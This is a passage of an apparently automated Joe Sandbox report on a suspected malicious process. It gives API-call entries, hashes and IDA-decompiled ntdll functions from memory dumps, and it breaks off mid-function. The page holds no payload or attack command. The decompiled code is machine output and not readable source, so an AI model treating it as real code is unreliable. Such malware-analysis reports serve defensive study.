                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                            • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                                                                                                                                            • Instruction ID: 19348ee7342093320553b069d24316b85920f4551995165ce641af32c692dbd7
                                                                                                                                                                            • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                                                                                                                                                            • Instruction Fuzzy Hash: B9E046B1200208ABDB14EF89DC48EEB3BADEF88750F018154FE095B241CA70F914CAF0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(02F469F6,?,02F4719D,02F4719D,?,02F469F6,?,?,?,?,?,00000000,00000005,00000206), ref: 02F4CA5D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                            • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                                                                                                                                            • Instruction ID: 0ce92e7f507f22ded42a0ef2166ed29d0a220bf61a127ed0f65caeb1942e1292
                                                                                                                                                                            • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                                                                                                                                                            • Instruction Fuzzy Hash: B9E046B1200208ABDB18EF99DC44EAB3BADEF88754F018154FE095B241CA70F910CAF0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F3DC42,02F3DC42,?,00000000,?,?), ref: 02F4CC00
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                                                            • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                                                                                                                                            • Instruction ID: 1d781865e28c22cc2ffd195cf4705196484a2dfea07aa4c674dbad91060008f9
                                                                                                                                                                            • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                                                                                                                                                            • Instruction Fuzzy Hash: 8BE01AB12002086BD710DF89DC45EE737ADAF88650F118154BA0957241C670E8108AB1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,02F3889A,?), ref: 02F3E11B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                            • Opcode ID: 4e93a443b8b69536e6177629f776be652ef008a54c3b3b0129f7797a997defe5
                                                                                                                                                                            • Instruction ID: 009c7917f3a15e9a0dbc919398c2da8196d16321bd63c0066dc229c2709a3cb4
                                                                                                                                                                            • Opcode Fuzzy Hash: 4e93a443b8b69536e6177629f776be652ef008a54c3b3b0129f7797a997defe5
                                                                                                                                                                            • Instruction Fuzzy Hash: A6E08672A902046BE714EBA08C43F6973949F55245F0500B4FA09EB2C3D760E0028920
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,02F3889A,?), ref: 02F3E11B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_2f30000_help.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                            • Opcode ID: af57193603f7944561e76fce7887abcdc7fa1c82de23c8cf729f6e0b6c60e868
                                                                                                                                                                            • Instruction ID: 5b7841531f7fc1a03c8e4bb0d7b8dd0995d04ccdfa8951bb2b3ad315a4f26a3f
                                                                                                                                                                            • Opcode Fuzzy Hash: af57193603f7944561e76fce7887abcdc7fa1c82de23c8cf729f6e0b6c60e868
                                                                                                                                                                            • Instruction Fuzzy Hash: E9D05E7168030426F614B6A58C03F2672899B48A85F0500A0FA08D62C3DA60F1004564
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 127cfa3bd704de3da4fc5793a742cd59e0fff1c5565bd94ef45f87028582b9a3
                                                                                                                                                                            • Instruction ID: 1cc37f531cd3dc652686d543346e20c42b7d0428e7d19ca0c37bb241f0a314a3
                                                                                                                                                                            • Opcode Fuzzy Hash: 127cfa3bd704de3da4fc5793a742cd59e0fff1c5565bd94ef45f87028582b9a3
                                                                                                                                                                            • Instruction Fuzzy Hash: 37B02B318020C5C5EE00E724070C707394467C2300F25C4DBD1420240E8338C080F131
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                            			E03977550(void* __ecx) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v548;
                                                                                                                                                                            				unsigned int _v552;
                                                                                                                                                                            				unsigned int _v556;
                                                                                                                                                                            				unsigned int _v560;
                                                                                                                                                                            				char _v564;
                                                                                                                                                                            				char _v568;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				unsigned int _t49;
                                                                                                                                                                            				signed char _t53;
                                                                                                                                                                            				unsigned int _t55;
                                                                                                                                                                            				unsigned int _t56;
                                                                                                                                                                            				unsigned int _t65;
                                                                                                                                                                            				unsigned int _t66;
                                                                                                                                                                            				void* _t68;
                                                                                                                                                                            				unsigned int _t73;
                                                                                                                                                                            				unsigned int _t77;
                                                                                                                                                                            				unsigned int _t85;
                                                                                                                                                                            				char* _t98;
                                                                                                                                                                            				unsigned int _t102;
                                                                                                                                                                            				signed int _t103;
                                                                                                                                                                            				void* _t105;
                                                                                                                                                                            				signed int _t107;
                                                                                                                                                                            				void* _t108;
                                                                                                                                                                            				void* _t110;
                                                                                                                                                                            				void* _t111;
                                                                                                                                                                            				void* _t112;
                                                                                                                                                                            
                                                                                                                                                                            				_t45 =  *0x3a3b370 ^ _t107;
                                                                                                                                                                            				_v8 =  *0x3a3b370 ^ _t107;
                                                                                                                                                                            				_t105 = __ecx;
                                                                                                                                                                            				if( *0x3a36664 == 0) {
                                                                                                                                                                            					L5:
                                                                                                                                                                            					return E03984B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t85 = 0;
                                                                                                                                                                            				E0394E580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
                                                                                                                                                                            				if(( *0x7ffe02d5 & 0x00000003) == 0) {
                                                                                                                                                                            					_t45 = 0;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t45 =  *(_v564 + 0x5f) & 0x00000001;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_t45 == 0) {
                                                                                                                                                                            					_v556 = _t85;
                                                                                                                                                                            					_t49 = E03977738(_t105);
                                                                                                                                                                            					__eflags = _t49;
                                                                                                                                                                            					if(_t49 != 0) {
                                                                                                                                                                            						L15:
                                                                                                                                                                            						_t103 = 2;
                                                                                                                                                                            						_v556 = _t103;
                                                                                                                                                                            						L10:
                                                                                                                                                                            						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
                                                                                                                                                                            						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
                                                                                                                                                                            							_t45 = 1;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t53 = E0397763B(_v564);
                                                                                                                                                                            							asm("sbb al, al");
                                                                                                                                                                            							_t45 =  ~_t53 + 1;
                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t45;
                                                                                                                                                                            						if(_t45 == 0) {
                                                                                                                                                                            							_t102 = _t103 | 0x00000040;
                                                                                                                                                                            							_v556 = _t102;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t102;
                                                                                                                                                                            						if(_t102 != 0) {
                                                                                                                                                                            							L33:
                                                                                                                                                                            							_push(4);
                                                                                                                                                                            							_push( &_v556);
                                                                                                                                                                            							_push(0x22);
                                                                                                                                                                            							_push(0xffffffff);
                                                                                                                                                                            							_t45 = E03982B70();
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L4;
                                                                                                                                                                            					}
                                                                                                                                                                            					_v552 = _t85;
                                                                                                                                                                            					_t102 =  &_v552;
                                                                                                                                                                            					_t55 = E039776ED(_t105 + 0x2c, _t102);
                                                                                                                                                                            					__eflags = _t55;
                                                                                                                                                                            					if(_t55 >= 0) {
                                                                                                                                                                            						__eflags = _v552 - _t85;
                                                                                                                                                                            						if(_v552 == _t85) {
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t85 = _t105 + 0x24;
                                                                                                                                                                            						E039CEF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
                                                                                                                                                                            						_v560 = 0x214;
                                                                                                                                                                            						E03988F40( &_v548, 0, 0x214);
                                                                                                                                                                            						_t106 =  *0x3a36664;
                                                                                                                                                                            						_t110 = _t108 + 0x20;
                                                                                                                                                                            						 *0x3a391e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
                                                                                                                                                                            						_t65 =  *((intOrPtr*)( *0x3a36664))();
                                                                                                                                                                            						__eflags = _t65;
                                                                                                                                                                            						if(_t65 == 0) {
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t66 = _v560;
                                                                                                                                                                            						__eflags = _t66;
                                                                                                                                                                            						if(_t66 == 0) {
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t66 - 0x214;
                                                                                                                                                                            						if(_t66 >= 0x214) {
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t68 = (_t66 >> 1) * 2 - 2;
                                                                                                                                                                            						__eflags = _t68 - 0x214;
                                                                                                                                                                            						if(_t68 >= 0x214) {
                                                                                                                                                                            							E03984C68();
                                                                                                                                                                            							goto L33;
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(_t85);
                                                                                                                                                                            						 *((short*)(_t107 + _t68 - 0x220)) = 0;
                                                                                                                                                                            						E039CEF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
                                                                                                                                                                            						_t111 = _t110 + 0x14;
                                                                                                                                                                            						_t73 = E0398A9C0( &_v548, L"Execute=1");
                                                                                                                                                                            						_push(_t85);
                                                                                                                                                                            						__eflags = _t73;
                                                                                                                                                                            						if(_t73 == 0) {
                                                                                                                                                                            							E039CEF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
                                                                                                                                                                            							_t106 =  &_v548;
                                                                                                                                                                            							_t98 =  &_v548;
                                                                                                                                                                            							_t112 = _t111 + 0x14;
                                                                                                                                                                            							_t77 = _v560 + _t98;
                                                                                                                                                                            							_v552 = _t77;
                                                                                                                                                                            							__eflags = _t98 - _t77;
                                                                                                                                                                            							if(_t98 >= _t77) {
                                                                                                                                                                            								goto L8;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L27;
                                                                                                                                                                            							}
                                                                                                                                                                            							do {
                                                                                                                                                                            								L27:
                                                                                                                                                                            								_t85 = E0398A690(_t106, 0x20);
                                                                                                                                                                            								__eflags = _t85;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                            									 *_t85 = 0;
                                                                                                                                                                            								}
                                                                                                                                                                            								E039CEF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
                                                                                                                                                                            								_t112 = _t112 + 0x10;
                                                                                                                                                                            								E039BCC1E(_t105, _t106, __eflags);
                                                                                                                                                                            								__eflags = _t85;
                                                                                                                                                                            								if(_t85 == 0) {
                                                                                                                                                                            									goto L8;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t41 = _t85 + 2; // 0x2
                                                                                                                                                                            								_t106 = _t41;
                                                                                                                                                                            								__eflags = _t106 - _v552;
                                                                                                                                                                            							} while (_t106 < _v552);
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                                            						_push(3);
                                                                                                                                                                            						_push(0x55);
                                                                                                                                                                            						E039CEF10();
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					}
                                                                                                                                                                            					L8:
                                                                                                                                                                            					_t56 = E03977648(_t105);
                                                                                                                                                                            					__eflags = _t56;
                                                                                                                                                                            					if(_t56 != 0) {
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t103 = _v556;
                                                                                                                                                                            					goto L10;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
                                                                                                                                                                            					goto L5;
                                                                                                                                                                            				}
                                                                                                                                                                            			}
































                                                                                                                                                                            0x03977560
                                                                                                                                                                            0x03977562
                                                                                                                                                                            0x0397756f
                                                                                                                                                                            0x03977571
                                                                                                                                                                            0x039775ab
                                                                                                                                                                            0x039775b9
                                                                                                                                                                            0x039775b9
                                                                                                                                                                            0x03977579
                                                                                                                                                                            0x03977583
                                                                                                                                                                            0x0397758f
                                                                                                                                                                            0x039b4443
                                                                                                                                                                            0x03977595
                                                                                                                                                                            0x0397759e
                                                                                                                                                                            0x0397759e
                                                                                                                                                                            0x039775a2
                                                                                                                                                                            0x039775bc
                                                                                                                                                                            0x039775c2
                                                                                                                                                                            0x039775c7
                                                                                                                                                                            0x039775c9
                                                                                                                                                                            0x03977621
                                                                                                                                                                            0x03977623
                                                                                                                                                                            0x03977624
                                                                                                                                                                            0x039775f8
                                                                                                                                                                            0x039775ff
                                                                                                                                                                            0x03977601
                                                                                                                                                                            0x0397762c
                                                                                                                                                                            0x03977603
                                                                                                                                                                            0x03977609
                                                                                                                                                                            0x03977610
                                                                                                                                                                            0x03977612
                                                                                                                                                                            0x03977612
                                                                                                                                                                            0x03977612
                                                                                                                                                                            0x03977614
                                                                                                                                                                            0x03977616
                                                                                                                                                                            0x03977630
                                                                                                                                                                            0x03977633
                                                                                                                                                                            0x03977633
                                                                                                                                                                            0x03977618
                                                                                                                                                                            0x0397761a
                                                                                                                                                                            0x039b45c9
                                                                                                                                                                            0x039b45c9
                                                                                                                                                                            0x039b45d1
                                                                                                                                                                            0x039b45d2
                                                                                                                                                                            0x039b45d4
                                                                                                                                                                            0x039b45d6
                                                                                                                                                                            0x039b45d6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x0397761a
                                                                                                                                                                            0x039775ce
                                                                                                                                                                            0x039775d4
                                                                                                                                                                            0x039775da
                                                                                                                                                                            0x039775df
                                                                                                                                                                            0x039775e1
                                                                                                                                                                            0x039b444a
                                                                                                                                                                            0x039b4450
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039b4456
                                                                                                                                                                            0x039b4469
                                                                                                                                                                            0x039b4476
                                                                                                                                                                            0x039b4486
                                                                                                                                                                            0x039b448b
                                                                                                                                                                            0x039b4497
                                                                                                                                                                            0x039b44b9
                                                                                                                                                                            0x039b44bf
                                                                                                                                                                            0x039b44c1
                                                                                                                                                                            0x039b44c3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039b44c9
                                                                                                                                                                            0x039b44cf
                                                                                                                                                                            0x039b44d1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039b44dc
                                                                                                                                                                            0x039b44de
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039b44e6
                                                                                                                                                                            0x039b44ed
                                                                                                                                                                            0x039b44ef
                                                                                                                                                                            0x039b45c4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039b45c4
                                                                                                                                                                            0x039b44f7
                                                                                                                                                                            0x039b44f8
                                                                                                                                                                            0x039b4510
                                                                                                                                                                            0x039b4515
                                                                                                                                                                            0x039b4524
                                                                                                                                                                            0x039b452b
                                                                                                                                                                            0x039b452c
                                                                                                                                                                            0x039b452e
                                                                                                                                                                            0x039b4556
                                                                                                                                                                            0x039b4561
                                                                                                                                                                            0x039b4567
                                                                                                                                                                            0x039b4569
                                                                                                                                                                            0x039b456c
                                                                                                                                                                            0x039b456e
                                                                                                                                                                            0x039b4574
                                                                                                                                                                            0x039b4576
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039b457c
                                                                                                                                                                            0x039b457c
                                                                                                                                                                            0x039b4584
                                                                                                                                                                            0x039b4588
                                                                                                                                                                            0x039b458a
                                                                                                                                                                            0x039b458c
                                                                                                                                                                            0x039b458e
                                                                                                                                                                            0x039b458e
                                                                                                                                                                            0x039b459b
                                                                                                                                                                            0x039b45a0
                                                                                                                                                                            0x039b45a7
                                                                                                                                                                            0x039b45ac
                                                                                                                                                                            0x039b45ae
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039b45b4
                                                                                                                                                                            0x039b45b4
                                                                                                                                                                            0x039b45b7
                                                                                                                                                                            0x039b45b7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039b45bf
                                                                                                                                                                            0x039b4530
                                                                                                                                                                            0x039b4535
                                                                                                                                                                            0x039b4537
                                                                                                                                                                            0x039b4539
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039b453e
                                                                                                                                                                            0x039775e7
                                                                                                                                                                            0x039775e9
                                                                                                                                                                            0x039775ee
                                                                                                                                                                            0x039775f0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039775f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039775a4
                                                                                                                                                                            0x039775a4
                                                                                                                                                                            0x039775a4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x039775a4

                                                                                                                                                                            Strings
                                                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039B4507
                                                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 039B454D
                                                                                                                                                                            • Execute=1, xrefs: 039B451E
                                                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 039B4530
                                                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 039B4592
                                                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 039B4460
                                                                                                                                                                            • ExecuteOptions, xrefs: 039B44AB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000013.00000002.5819735175.0000000003910000.00000040.00000800.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                                                            • Associated: 00000013.00000002.5827656836.0000000003A39000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 00000013.00000002.5827777284.0000000003A3D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_19_2_3910000_help.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                            • API String ID: 0-484625025
                                                                                                                                                                            • Opcode ID: 11b15fb69f90629fbcf925d8773581fd5a172d38d83458cc03e830225f5a77f7
                                                                                                                                                                            • Instruction ID: 3e08982c769dd5451d5a26065725bc9fe1a9b3c2fd488b93d6d905f56d318a59
                                                                                                                                                                            • Opcode Fuzzy Hash: 11b15fb69f90629fbcf925d8773581fd5a172d38d83458cc03e830225f5a77f7
                                                                                                                                                                            • Instruction Fuzzy Hash: FD51E431A003196ADF20EBE5DC85FFD77ACEF88780F0804E9E505AB1C5EB709A559B61
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                            			E03949046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				short _t95;
                                                                                                                                                                            				intOrPtr _t110;
                                                                                                                                                                            				short _t118;
                                                                                                                                                                            				signed int _t131;
                                                                                                                                                                            				intOrPtr _t136;
                                                                                                                                                                            				intOrPtr _t140;
                                                                                                                                                                            				intOrPtr _t146;
                                                                                                                                                                            				intOrPtr* _t148;
                                                                                                                                                                            				intOrPtr _t151;
                                                                                                                                                                            				intOrPtr _t152;
                                                                                                                                                                            				intOrPtr* _t154;
                                                                                                                                                                            				void* _t156;
                                                                                                                                                                            
                                                                                                                                                                            				_t141 = __edx;
                                                                                                                                                                            				_push(0x154);
                                                                                                                                                                            				_push(0x3a1be98);
                                                                                                                                                                            				E03997C40(__ebx, __edi, __esi);
                                                                                                                                                                            				 *(_t156 - 0xf0) = __edx;
                                                                                                                                                                            				_t151 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
                                                                                                                                                                            				 *((short*)(_t156 - 0xda)) = 0;
                                                                                                                                                                            				 *(_t156 - 0xe0) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
                                                                                                                                                                            				E03988F40(_t156 - 0x13c, 0, 0x3c);
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
                                                                                                                                                                            				 *((intOrPtr*)(_t156 - 0x160)) = 1;
                                                                                                                                                                            				_t131 = 7;
                                                                                                                                                                            				memset(_t156 - 0x15c, 0, _t131 << 2);
                                                                                                                                                                            				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
                                                                                                                                                                            				_t152 = E03959870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
                                                                                                                                                                            				if(_t152 >= 0) {
                                                                                                                                                                            					if( *0x3a365e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
                                                                                                                                                                            						goto L1;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t152 = E0395A170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
                                                                                                                                                                            						if(_t152 < 0) {
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						}
                                                                                                                                                                            						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
                                                                                                                                                                            							L11:
                                                                                                                                                                            							_t152 = 0xc0150005;
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
                                                                                                                                                                            							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
                                                                                                                                                                            								 *(_t156 - 0x120) = 0xfffffffc;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t136 =  *((intOrPtr*)(_t156 - 0x114));
                                                                                                                                                                            						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
                                                                                                                                                                            						 *((short*)(_t156 - 0xda)) = _t95;
                                                                                                                                                                            						 *((short*)(_t156 - 0xdc)) = _t95;
                                                                                                                                                                            						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
                                                                                                                                                                            						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
                                                                                                                                                                            						 *((short*)(_t156 - 0xea)) = 0xaa;
                                                                                                                                                                            						_t152 = E03965A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
                                                                                                                                                                            						if(_t152 < 0 || E039604C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t154 =  *0x3a365e0; // 0x7681a680
                                                                                                                                                                            							 *0x3a391e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
                                                                                                                                                                            							_t152 =  *_t154();
                                                                                                                                                                            							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
                                                                                                                                                                            							if(_t152 < 0) {
                                                                                                                                                                            								goto L1;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
                                                                                                                                                                            								if(_t110 == 0xffffffff) {
                                                                                                                                                                            									L26:
                                                                                                                                                                            									 *((intOrPtr*)(_t156 - 4)) = 1;
                                                                                                                                                                            									_t148 =  *0x3a365e8; // 0x75767740
                                                                                                                                                                            									if(_t148 != 0) {
                                                                                                                                                                            										 *0x3a391e0(_t110);
                                                                                                                                                                            										 *_t148();
                                                                                                                                                                            									}
                                                                                                                                                                            									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
                                                                                                                                                                            									goto L1;
                                                                                                                                                                            								}
                                                                                                                                                                            								E0395DC40(_t156 - 0x164, _t110);
                                                                                                                                                                            								 *((intOrPtr*)(_t156 - 4)) = 0;
                                                                                                                                                                            								if( *((intOrPtr*)(_t146 + 4)) != 0) {
                                                                                                                                                                            									E03953B90(_t146);
                                                                                                                                                                            								}
                                                                                                                                                                            								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
                                                                                                                                                                            								_t152 = E03959870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
